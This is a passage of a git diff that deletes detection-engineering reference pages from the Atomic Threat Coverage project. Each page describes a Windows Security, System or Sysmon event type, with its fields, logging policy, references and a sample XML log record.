-| **Logging Policy** | <ul><li>[LP0001_windows_audit_process_creation](../Logging_Policies/LP0001_windows_audit_process_creation.md)</li><li>[LP0002_windows_audit_process_creation_with_commandline](../Logging_Policies/LP0002_windows_audit_process_creation_with_commandline.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4688.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4688.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>NewProcessId</li><li>ProcessId</li><li>NewProcessName</li><li>ProcessName</li><li>NewProcessName</li><li>Image</li><li>TokenElevationType</li><li>CommandLine</li><li>ProcessCommandLine</li><li>ProcesssCommandLine</li><li>TargetUserSid</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetLogonId</li><li>ParentProcessName</li><li>ParentImage</li><li>MandatoryLabel</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4688</EventID> 
-    <Version>2</Version> 
-    <Level>0</Level> 
-    <Task>13312</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-06T20:34:57.910980700Z" /> 
-    <EventRecordID>3542561</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="4" ThreadID="92" /> 
-    <Channel>Security</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-540864798-2899685673-3651185163-500</Data> 
-    <Data Name="SubjectUserName">user1</Data> 
-    <Data Name="SubjectDomainName">atc-win-10</Data> 
-    <Data Name="SubjectLogonId">0xcdd96</Data> 
-    <Data Name="NewProcessId">0x12d0</Data> 
-    <Data Name="NewProcessName">C:\Users\user1\Desktop\PSTools\PsExec64.exe</Data> 
-    <Data Name="TokenElevationType">%%1936</Data> 
-    <Data Name="ProcessId">0x21d4</Data> 
-    <Data Name="CommandLine">PsExec64.exe -i -s -d cmd</Data> 
-    <Data Name="TargetUserSid">S-1-0-0</Data> 
-    <Data Name="TargetUserName">-</Data> 
-    <Data Name="TargetDomainName">-</Data> 
-    <Data Name="TargetLogonId">0x0</Data> 
-    <Data Name="ParentProcessName">C:\Windows\System32\cmd.exe</Data> 
-    <Data Name="MandatoryLabel">S-1-16-12288</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0003_1_windows_sysmon_process_creation.md b/Atomic_Threat_Coverage/Data_Needed/DN0003_1_windows_sysmon_process_creation.md
deleted file mode 100644
index 1080b5c..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0003_1_windows_sysmon_process_creation.md
+++ /dev/null
@@ -1,66 +0,0 @@
-| Title              | DN0003_1_windows_sysmon_process_creation       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Windows process creation log, including command line |
-| **Logging Policy** | <ul><li>[LP0003_windows_sysmon_process_creation](../Logging_Policies/LP0003_windows_sysmon_process_creation.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90001](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90001)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li><li>UtcTime</li><li>Username</li><li>User</li><li>ProcessGuid</li><li>ProcessId</li><li>ProcessName</li><li>CommandLine</li><li>LogonGuid</li><li>LogonId</li><li>TerminalSessionid</li><li>IntegrityLevel</li><li>Hashes</li><li>Imphash</li><li>Sha256hash</li><li>Sha1hash</li><li>Md5hash</li><li>Image</li><li>ParentImage</li><li>ParentProcessGuid</li><li>ParentProcessId</li><li>ParentProcessName</li><li>ParentCommandLine</li><li>OriginalFileName</li><li>FileVersion</li><li>Description</li><li>Product</li><li>Company</li><li>CurrentDirectory</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>1</EventID> 
-    <Version>5</Version> 
-    <Level>4</Level> 
-    <Task>1</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-09T03:44:58.290314900Z" /> 
-    <EventRecordID>4219</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="1976" ThreadID="3196" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10</Computer> 
-    <Security UserID="S-1-5-18" /> 
-    </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-07-09 03:44:58.036</Data> 
-    <Data Name="ProcessGuid">{717CFEC0-0DBA-5D24-0000-001087BC0800}</Data> 
-    <Data Name="ProcessId">5500</Data> 
-    <Data Name="Image">C:\Windows\System32\conhost.exe</Data> 
-    <Data Name="FileVersion">10.0.14393.0 (rs1_release.160715-1616)</Data> 
-    <Data Name="Description">Console Window Host</Data> 
-    <Data Name="Product">Microsoft® Windows® Operating System</Data> 
-    <Data Name="Company">Microsoft Corporation</Data> 
-    <Data Name="OriginalFileName">CONHOST.EXE</Data> 
-    <Data Name="CommandLine">\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1</Data> 
-    <Data Name="CurrentDirectory">C:\Windows</Data> 
-    <Data Name="User">atc-win-10\yugoslavskiy</Data> 
-    <Data Name="LogonGuid">{717CFEC0-0DA0-5D24-0000-0020D0F50300}</Data> 
-    <Data Name="LogonId">0x3f5d0</Data> 
-    <Data Name="TerminalSessionId">1</Data> 
-    <Data Name="IntegrityLevel">Medium</Data> 
-    <Data Name="Hashes">MD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0</Data> 
-    <Data Name="ParentProcessGuid">{717CFEC0-0DB9-5D24-0000-0010C9BB0800}</Data> 
-    <Data Name="ParentProcessId">4412</Data> 
-    <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data> 
-    <Data Name="ParentCommandLine">"C:\Windows\System32\cmd.exe" /q /c rmdir /s /q "C:\Users\yugoslavskiy\AppData\Local\Microsoft\OneDrive\19.086.0502.0006"</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0004_4624_windows_account_logon.md b/Atomic_Threat_Coverage/Data_Needed/DN0004_4624_windows_account_logon.md
deleted file mode 100644
index 3588b26..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0004_4624_windows_account_logon.md
+++ /dev/null
@@ -1,71 +0,0 @@
-| Title              | DN0004_4624_windows_account_logon       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | An account was successfully logged on |
-| **Logging Policy** | <ul><li>[LP0004_windows_audit_logon](../Logging_Policies/LP0004_windows_audit_logon.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4624.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4624.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>AccountName</li><li>Hostname</li><li>Computer</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>TargetUserSid</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetLogonId</li><li>LogonType</li><li>LogonProcessName</li><li>AuthenticationPackageName</li><li>WorkstationName</li><li>LogonGuid</li><li>TransmittedServices</li><li>LmPackageName</li><li>KeyLength</li><li>ProcessId</li><li>ProcessName</li><li>IpAddress</li><li>IpPort</li><li>ImpersonationLevel</li><li>RestrictedAdminMode</li><li>TargetOutboundUserName</li><li>TargetOutboundDomainName</li><li>VirtualAccount</li><li>TargetLinkedLogonId</li><li>ElevatedToken</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4624</EventID> 
-    <Version>2</Version> 
-    <Level>0</Level> 
-    <Task>12544</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-11-12T00:24:35.079785200Z" /> 
-    <EventRecordID>211</EventRecordID> 
-    <Correlation ActivityID="{00D66690-1CDF-0000-AC66-D600DF1CD101}" /> 
-    <Execution ProcessID="716" ThreadID="760" /> 
-    <Channel>Security</Channel> 
-    <Computer>WIN-GG82ULGC9GO</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-18</Data> 
-    <Data Name="SubjectUserName">WIN-GG82ULGC9GO$</Data> 
-    <Data Name="SubjectDomainName">WORKGROUP</Data> 
-    <Data Name="SubjectLogonId">0x3e7</Data> 
-    <Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-500</Data> 
-    <Data Name="TargetUserName">Administrator</Data> 
-    <Data Name="TargetDomainName">WIN-GG82ULGC9GO</Data> 
-    <Data Name="TargetLogonId">0x8dcdc</Data> 
-    <Data Name="LogonType">2</Data> 
-    <Data Name="LogonProcessName">User32</Data> 
-    <Data Name="AuthenticationPackageName">Negotiate</Data> 
-    <Data Name="WorkstationName">WIN-GG82ULGC9GO</Data> 
-    <Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data> 
-    <Data Name="TransmittedServices">-</Data> 
-    <Data Name="LmPackageName">-</Data> 
-    <Data Name="KeyLength">0</Data> 
-    <Data Name="ProcessId">0x44c</Data> 
-    <Data Name="ProcessName">C:\\Windows\\System32\\svchost.exe</Data> 
-    <Data Name="IpAddress">127.0.0.1</Data> 
-    <Data Name="IpPort">0</Data> 
-    <Data Name="ImpersonationLevel">%%1833</Data> 
-    <Data Name="RestrictedAdminMode">-</Data> 
-    <Data Name="TargetOutboundUserName">-</Data> 
-    <Data Name="TargetOutboundDomainName">-</Data> 
-    <Data Name="VirtualAccount">%%1843</Data> 
-    <Data Name="TargetLinkedLogonId">0x0</Data> 
-    <Data Name="ElevatedToken">%%1842</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0005_7045_windows_service_insatalled.md b/Atomic_Threat_Coverage/Data_Needed/DN0005_7045_windows_service_insatalled.md
deleted file mode 100644
index 2013aa4..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0005_7045_windows_service_insatalled.md
+++ /dev/null
@@ -1,49 +0,0 @@
-| Title              | DN0005_7045_windows_service_insatalled       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | A service was installed in the system |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[None](None)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | Service Control Manager    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li><li>ProcessID</li><li>ServiceName</li><li>ImagePath</li><li>ServiceFileName</li><li>ServiceType</li><li>StartType</li><li>AccountName</li><li>UserSid</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Service Control Manager" Guid="{555908d1-a6d7-4695-8e1e-26931d2012f4}" EventSourceName="Service Control Manager" /> 
-    <EventID Qualifiers="16384">7045</EventID> 
-    <Version>0</Version> 
-    <Level>4</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8080000000000000</Keywords> 
-    <TimeCreated SystemTime="2017-07-02T15:48:56.256752900Z" /> 
-    <EventRecordID>762</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="568" ThreadID="1792" /> 
-    <Channel>System</Channel> 
-    <Computer>DESKTOP</Computer> 
-    <Security UserID="S-1-5-21-2073602604-586167410-2329295167-1001" /> 
-    </System>
-  - <EventData>
-    <Data Name="ServiceName">sshd</Data> 
-    <Data Name="ImagePath">C:\Program Files\OpenSSH\sshd.exe</Data> 
-    <Data Name="ServiceType">user mode service</Data> 
-    <Data Name="StartType">demand start</Data> 
-    <Data Name="AccountName">LocalSystem</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0006_2_windows_sysmon_process_changed_a_file_creation_time.md b/Atomic_Threat_Coverage/Data_Needed/DN0006_2_windows_sysmon_process_changed_a_file_creation_time.md
deleted file mode 100644
index 15caefa..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0006_2_windows_sysmon_process_changed_a_file_creation_time.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0006_2_windows_sysmon_process_changed_a_file_creation_time       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Explicit modification of file creation timestamp by a process |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90002](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90002)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-2.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-2.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>TargetFilename</li><li>CreationUtcTime</li><li>PreviousCreationUtcTime</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>2</EventID> 
-    <Version>4</Version> 
-    <Level>4</Level> 
-    <Task>2</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2018-12-10T15:08:56.961102400Z" /> 
-    <EventRecordID>6994</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="2940" ThreadID="3576" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2018-12-10 15:08:56.954</Data> 
-    <Data Name="ProcessGuid">{9683FBB1-8164-5C0E-0000-00104B532800}</Data> 
-    <Data Name="ProcessId">2788</Data> 
-    <Data Name="Image">C:\Users\user1\AppData\Local\Temp\chocolatey\wireshark\2.6.5\Wireshark-win64-2.6.5.exe</Data> 
-    <Data Name="TargetFilename">C:\Program Files\Wireshark\user-guide.chm</Data> 
-    <Data Name="CreationUtcTime">2018-11-28 18:37:08.000</Data> 
-  <Data Name="PreviousCreationUtcTime">2018-12-10 15:08:56.486</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0007_3_windows_sysmon_network_connection.md b/Atomic_Threat_Coverage/Data_Needed/DN0007_3_windows_sysmon_network_connection.md
deleted file mode 100644
index 7137a58..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0007_3_windows_sysmon_network_connection.md
+++ /dev/null
@@ -1,62 +0,0 @@
-| Title              | DN0007_3_windows_sysmon_network_connection       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | TCP/UDP connections made by a process |
-| **Logging Policy** | <ul><li>[LP0005_windows_sysmon_network_connection](../Logging_Policies/LP0005_windows_sysmon_network_connection.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90003](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90003)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-3.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-3.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>User</li><li>Protocol</li><li>Initiated</li><li>SourceIsIpv6</li><li>SourceIp</li><li>SourceHostname</li><li>SourcePort</li><li>SourcePortName</li><li>DestinationIsIpv6</li><li>DestinationIp</li><li>DestinationHostname</li><li>DestinationPort</li><li>DestinationPortName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>3</EventID> 
-    <Version>5</Version> 
-    <Level>4</Level> 
-    <Task>3</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-05T15:16:29.384924000Z" /> 
-    <EventRecordID>16000</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="1828" ThreadID="2764" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>ATC-WIN-7.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-02-05 15:16:17.411</Data> 
-    <Data Name="ProcessGuid">{A96EFBF1-A8C9-5C59-0000-0010D274D300}</Data> 
-    <Data Name="ProcessId">3900</Data> 
-    <Data Name="Image">C:\Users\user1\Desktop\SysinternalsSuite\PsExec.exe</Data> 
-    <Data Name="User">ATC-WIN-7\user1</Data> 
-    <Data Name="Protocol">tcp</Data> 
-    <Data Name="Initiated">true</Data> 
-    <Data Name="SourceIsIpv6">false</Data> 
-    <Data Name="SourceIp">10.0.0.111</Data> 
-    <Data Name="SourceHostname">ATC-WIN-7.atc.local</Data> 
-    <Data Name="SourcePort">49603</Data> 
-    <Data Name="SourcePortName" /> 
-    <Data Name="DestinationIsIpv6">false</Data> 
-    <Data Name="DestinationIp">10.0.0.103</Data> 
-    <Data Name="DestinationHostname">ATC-WIN-10</Data> 
-    <Data Name="DestinationPort">135</Data> 
-    <Data Name="DestinationPortName">epmap</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0008_4_windows_sysmon_sysmon_service_state_changed.md b/Atomic_Threat_Coverage/Data_Needed/DN0008_4_windows_sysmon_sysmon_service_state_changed.md
deleted file mode 100644
index b31e8f8..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0008_4_windows_sysmon_sysmon_service_state_changed.md
+++ /dev/null
@@ -1,48 +0,0 @@
-| Title              | DN0008_4_windows_sysmon_sysmon_service_state_changed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Sysmon service changed status |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90004](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90004)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-4.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-4.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>State</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>4</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>4</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-05T13:11:20.289486200Z" /> 
-    <EventRecordID>45818</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3172" ThreadID="4192" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="UtcTime">2019-02-05 13:11:20.281</Data> 
-    <Data Name="State">Started</Data> 
-    <Data Name="Version">8.00</Data> 
-    <Data Name="SchemaVersion">4.10</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0009_5_windows_sysmon_process_terminated.md b/Atomic_Threat_Coverage/Data_Needed/DN0009_5_windows_sysmon_process_terminated.md
deleted file mode 100644
index 3e062d2..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0009_5_windows_sysmon_process_terminated.md
+++ /dev/null
@@ -1,49 +0,0 @@
-| Title              | DN0009_5_windows_sysmon_process_terminated       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Process has been terminated |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90005](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90005)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>5</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>5</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-05T15:16:38.833314100Z" /> 
-    <EventRecordID>57994</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3172" ThreadID="4192" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-02-05 15:16:38.821</Data> 
-    <Data Name="ProcessGuid">{9683FBB1-A8D6-5C59-0000-001009797000}</Data> 
-    <Data Name="ProcessId">2440</Data> 
-    <Data Name="Image">C:\Windows\PSEXESVC.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0010_6_windows_sysmon_driver_loaded.md b/Atomic_Threat_Coverage/Data_Needed/DN0010_6_windows_sysmon_driver_loaded.md
deleted file mode 100644
index c02c228..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0010_6_windows_sysmon_driver_loaded.md
+++ /dev/null
@@ -1,51 +0,0 @@
-| Title              | DN0010_6_windows_sysmon_driver_loaded       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The driver loaded events provides information about a driver being loaded on  the system. The configured hashes are provided as well as signature  information |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90006](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90006)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-6.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-6.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ImageLoaded</li><li>Hashes</li><li>Sha256hash</li><li>Md5hash</li><li>Signed</li><li>Signature</li><li>SignatureStatus</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>6</EventID> 
-    <Version>3</Version> 
-    <Level>4</Level> 
-    <Task>6</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2018-12-09T21:41:44.778524700Z" /> 
-    <EventRecordID>4565</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="2996" ThreadID="3992" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2018-12-09 21:41:41.091</Data> 
-    <Data Name="ImageLoaded">C:\Windows\System32\drivers\PROCEXP152.SYS</Data> 
-    <Data Name="Hashes">MD5=8213C5972C91A56BE78CD02A4DE4E3FC,SHA256=95D07C3B8DF26790AC43BB4259F65D1E90B03EA31D66F1B3961D85E21C5FF590</Data> 
-    <Data Name="Signed">true</Data> 
-    <Data Name="Signature">Sysinternals</Data> 
-    <Data Name="SignatureStatus">Valid</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0011_7_windows_sysmon_image_loaded.md b/Atomic_Threat_Coverage/Data_Needed/DN0011_7_windows_sysmon_image_loaded.md
deleted file mode 100644
index 2aeb564..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0011_7_windows_sysmon_image_loaded.md
+++ /dev/null
@@ -1,59 +0,0 @@
-| Title              | DN0011_7_windows_sysmon_image_loaded       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The image loaded event logs when a module is loaded in a specific process |
-| **Logging Policy** | <ul><li>[LP0006_windows_sysmon_image_loaded](../Logging_Policies/LP0006_windows_sysmon_image_loaded.md)</li></ul> |
-| **References**     | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90007](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90007)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-7.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-7.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>ProcessGuid</li><li>ProcessId</li><li>Image</li><li>ImageLoaded</li><li>FileVersion</li><li>Description</li><li>Product</li><li>Company</li><li>OriginalFileName</li><li>Hashes</li><li>Signed</li><li>Signature</li><li>SignatureStatus</li></ul> |
-
-
-## Log Samples
